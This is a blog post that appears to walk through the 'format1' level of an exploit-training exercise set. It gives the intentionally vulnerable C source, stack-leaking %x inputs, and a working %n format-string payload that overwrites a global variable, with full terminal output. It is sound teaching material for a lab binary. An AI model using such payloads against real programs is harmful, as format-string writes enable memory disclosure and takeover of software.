A simple Format String exploit example - bin 0x11

最新推荐文章于 2024-08-03 20:32:29 发布

double_dogg

最新推荐文章于 2024-08-03 20:32:29 发布

阅读量137

点赞数

分类专栏： LiveOverFlow

本文链接：https://blog.csdn.net/weixin_42732173/article/details/112326377

版权

LiveOverFlow 专栏收录该内容

12 篇文章 0 订阅

订阅专栏

format1

This level shows how format strings can be used to modify arbitrary memory locations.

Hints: objdump -t is your friend, and your input string lies far up the stack :) (you can use objdump -t to find all symbols from the binary)

first of all, it's a memory leak vulnerability. you can leak all kinds of stuff from the stack. Imagin you had a program with ASLR, meaning that the location of the stack in memory is random. And you don't know where it is, but you need the address for a buffer overflow to jump to shellcode. with this here, you can leak values from the process memory, more specifically from the stack addresses.

$ ./format1 "%x %x %x %x"
804960c bffff6d8 8048469 b7fd8304
$ ./format1 "`python -c 'print("%x "*20)'`"
804960c bffff6a8 8048469 b7fd8304 b7fd7ff4 bffff6a8 8048435 bffff890 b7ff1040 804845b b7fd7ff4 8048450 0 bffff728 b7eadc76 2 bffff754 bffff760 b7fe1848 bffff710

source code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
  printf(string);
  
  if(target) {
      printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}

get the address of target:

$ objdump -t ./format1 | grep target
08049638 g     O .bss	00000004              target
$ ./format1 "`python -c 'print("AAAA" + "\x38\x96\x04\x08" + "BBBBBBBBB" + "%x "*137)'`"
AAAA8BBBBBBBBB804960c bffff538 8048469 b7fd8304 b7fd7ff4 bffff538 8048435 bffff720 b7ff1040 804845b b7fd7ff4 8048450 0 bffff5b8 b7eadc76 2 bffff5e4 bffff5f0 b7fe1848 bffff5a0 ffffffff b7ffeff4 804824d 1 bffff5a0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff5b8 94293f61 be7bc971 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff5e4 8048450 8048440 b7ff1040 bffff5dc b7fff8f8 2 bffff716 bffff720 0 bffff8cd bffff8e2 bffff8f9 bffff911 bffff91f bffff933 bffff957 bffff96e bffff981 bffff98b bffffe7b bffffe94 bffffed2 bffffee6 bfffff04 bfffff1b bfffff2c bfffff47 bfffff4f bfffff5f bfffff6c bfffffa4 bfffffb8 bfffffcc bfffffd8 0 20 b7fe2414 21 b7fe2000 10 f8bfbff 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff6fb 1f bffffff2 f bffff70b 0 0 b1000000 dffb6907 530f35e1 b99af379 699d7479 363836 0 2f2e0000 6d726f66 317461 41414141 8049638 
$ ./format1 "`python -c 'print("AAAA" + "\x38\x96\x04\x08" + "BBBBBBBBB" + "%x "*136 + "%n ")'`"
AAAA8BBBBBBBBB804960c bffff538 8048469 b7fd8304 b7fd7ff4 bffff538 8048435 bffff720 b7ff1040 804845b b7fd7ff4 8048450 0 bffff5b8 b7eadc76 2 bffff5e4 bffff5f0 b7fe1848 bffff5a0 ffffffff b7ffeff4 804824d 1 bffff5a0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff5b8 eb6e6312 c13c9502 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff5e4 8048450 8048440 b7ff1040 bffff5dc b7fff8f8 2 bffff716 bffff720 0 bffff8cd bffff8e2 bffff8f9 bffff911 bffff91f bffff933 bffff957 bffff96e bffff981 bffff98b bffffe7b bffffe94 bffffed2 bffffee6 bfffff04 bfffff1b bfffff2c bfffff47 bfffff4f bfffff5f bfffff6c bfffffa4 bfffffb8 bfffffcc bfffffd8 0 20 b7fe2414 21 b7fe2000 10 f8bfbff 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff6fb 1f bffffff2 f bffff70b 0 0 b000000 71214f20 85368a42 13ebb60d 6998cac7 363836 0 2f2e0000 6d726f66 317461 41414141  you have modified the target :)

and pwned...

double_dogg

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
A simple Format String exploit example - bin 0x11

format1This level shows how format strings can be used to modify arbitrary memory locations.Hints: objdump -t is your friend, and your input string lies far up the stack :) (you can use objdump -t to find all symbols fromthe binary)first of all,.
复制链接

扫一扫